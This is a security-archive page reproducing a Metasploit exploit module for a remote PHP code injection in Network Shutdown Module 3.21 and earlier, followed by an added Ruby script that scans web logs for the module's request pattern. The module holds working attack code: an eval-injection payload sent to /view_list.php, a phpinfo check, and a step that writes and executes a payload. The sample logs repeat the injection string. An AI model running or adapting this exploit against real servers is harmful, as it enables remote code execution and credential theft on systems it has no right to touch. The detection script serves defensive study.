Network Shutdown Module 3.21 Remote PHP Code Injection

Published: 29 Nov 2012. Reported by: sinn3r. Type: packetstorm. Source: packetstormsecurity.com

Network Shutdown Module <= 3.21 Remote PHP Code Injection that steals user credentials using unsanitized user input in lib/dbtools.in

Code
```ruby
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
# http://metasploit.com/
##

require 'msf/core'
require 'msf/core/exploit/php_exe'

class Metasploit3 < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::PhpEXE

  def initialize(info = {})
    super(update_info(info,
      'Name' => 'Network Shutdown Module <= 3.21 (sort_values) Remote PHP Code Injection',
      'Description' => %q{
        This module exploits a vulnerability in lib/dbtools.inc which uses
        unsanitized user input inside a eval() call. Additionally the base64 encoded
        user credentials are extracted from the database of the application. Please
        note that in order to be able to steal credentials, the vulnerable service
        must have at least one USV module (an entry in the "nodes" table in mgedb.db)
      },
      'Author' =>
        [
          'h0ng10', # original discovery, msf module
          'sinn3r' # PhpEXE shizzle
        ],
      'License' => MSF_LICENSE,
      'References' =>
        [
          ['OSVDB', '83199'],
          ['URL', 'http://secunia.com/advisories/49103/']
        ],
      'Payload' =>
        {
          'DisableNops' => true,
          'Space' => 4000
        },
      'Platform' => ['php', 'linux'],
      'Arch' => ARCH_PHP,

      'Targets' =>
        [
          [ 'Generic (PHP Payload)', { 'Arch' => ARCH_PHP, 'Platform' => 'php' } ],
          [ 'Linux x86' , { 'Arch' => ARCH_X86, 'Platform' => 'linux'} ]
        ],
      'DefaultTarget' => 0,
      'Privileged' => true,
      'DisclosureDate' => 'Jun 26 2012'
    ))

    register_options(
      [
        Opt::RPORT(4679)
      ], self.class)
  end

  def check
    # we use a call to phpinfo() for verification
    res = execute_php_code("phpinfo();die();")

    if not res or res.code != 200
      print_error("Failed: Error requesting page")
      return CheckCode::Unknown
    end

    return CheckCode::Vulnerable if (res.body =~ /This program makes use of the Zend/)
    return CheckCode::Safe
  end

  def execute_php_code(code, opts = {})
    param_name = rand_text_alpha(6)
    padding = rand_text_alpha(6)
    url_param = "#{padding}%22%5d,%20eval(base64_decode(%24_POST%5b%27#{param_name}%27%5d))%29;%2f%2f"

    res = send_request_cgi(
      {
        'uri' => '/view_list.php',
        'method' => 'POST',
        'vars_get' =>
          {
            'paneStatusListSortBy' => url_param,
          },
        'vars_post' =>
          {
            param_name => Rex::Text.encode_base64(code),
          },
        'headers' =>
          {
            'Connection' => 'Close',
          }
      })
  end

  def no_php_tags(p)
    p = p.gsub(/^<\?php /, '')
    p.gsub(/ \?\>$/, '')
  end

  def exploit
    print_status("#{rhost}:#{rport} - Sending payload")

    unlink = (target['Platform'] == 'linux') ? true : false
    p = no_php_tags(get_write_exec_payload(:unlink_self => unlink))

    execute_php_code(p)
    handler
  end
end
```
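For detection, the module's request shape (a `paneStatusListSortBy` query parameter on `/view_list.php` carrying more than a plain sort key) can be matched in web access logs. The following is an added example, not part of the original module or the vendor's code; the log format, the allow-list pattern, the sample lines and the helper names `fully_decode` and `suspicious_requests` are assumptions made for illustration.

```ruby
require 'uri'

TARGET_PATH   = '/view_list.php'
TARGET_PARAM  = 'paneStatusListSortBy'
# Assumption: a legitimate sort key is a plain column-style identifier.
SAFE_SORT_KEY = /\A[A-Za-z0-9_]{0,64}\z/
REQUEST_RE    = /"(?<method>[A-Z]+) (?<target>\S+) HTTP\/[\d.]+"/

# Constructed sample lines (common log format), not taken from a real host.
SAMPLE_LOG = <<~'LOG'
  10.0.0.5 - - [29/Nov/2012:10:00:01 +0000] "GET /view_list.php?paneStatusListSortBy=status HTTP/1.1" 200 5120
  10.0.0.9 - - [29/Nov/2012:10:00:07 +0000] "POST /view_list.php?paneStatusListSortBy=AbCdEf%22%5d,%20eval(base64_decode(%24_POST%5b%27QwErTy%27%5d))%29;%2f%2f HTTP/1.1" 200 70211
  10.0.0.5 - - [29/Nov/2012:10:00:09 +0000] "GET /index.php?page=view_list HTTP/1.1" 200 900
  10.0.0.7 - - [29/Nov/2012:10:00:12 +0000] "GET /view_list.php?paneStatusListSortBy=name%2527 HTTP/1.1" 200 5120
LOG

# Percent-decode until the value stops changing (bounded), so double
# encoding such as %2527 cannot hide a quote from the allow-list check.
def fully_decode(value, max_rounds = 3)
  max_rounds.times do
    decoded = URI.decode_www_form_component(value)
    return decoded if decoded == value
    value = decoded
  end
  value
rescue ArgumentError
  value # malformed escapes stay undecoded and fail the allow-list
end

# Return one hash per request whose sort key is not a plain identifier.
def suspicious_requests(log_text)
  log_text.each_line.filter_map do |line|
    m = REQUEST_RE.match(line)
    next unless m
    path, query = m[:target].split('?', 2)
    next unless path == TARGET_PATH && query
    pair = query.split('&').map { |kv| kv.split('=', 2) }
                .find { |key, _| key == TARGET_PARAM }
    next unless pair && pair[1]
    value = fully_decode(pair[1])
    next if SAFE_SORT_KEY.match?(value)
    { client: line.split.first, method: m[:method], value: value }
  end
end

if __FILE__ == $PROGRAM_NAME
  suspicious_requests(SAMPLE_LOG).each { |hit| puts hit.inspect }
end
```

The same allow-list idea applies on the server side: a sort key that is validated as a plain identifier before use cannot break out of the expression passed to eval().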
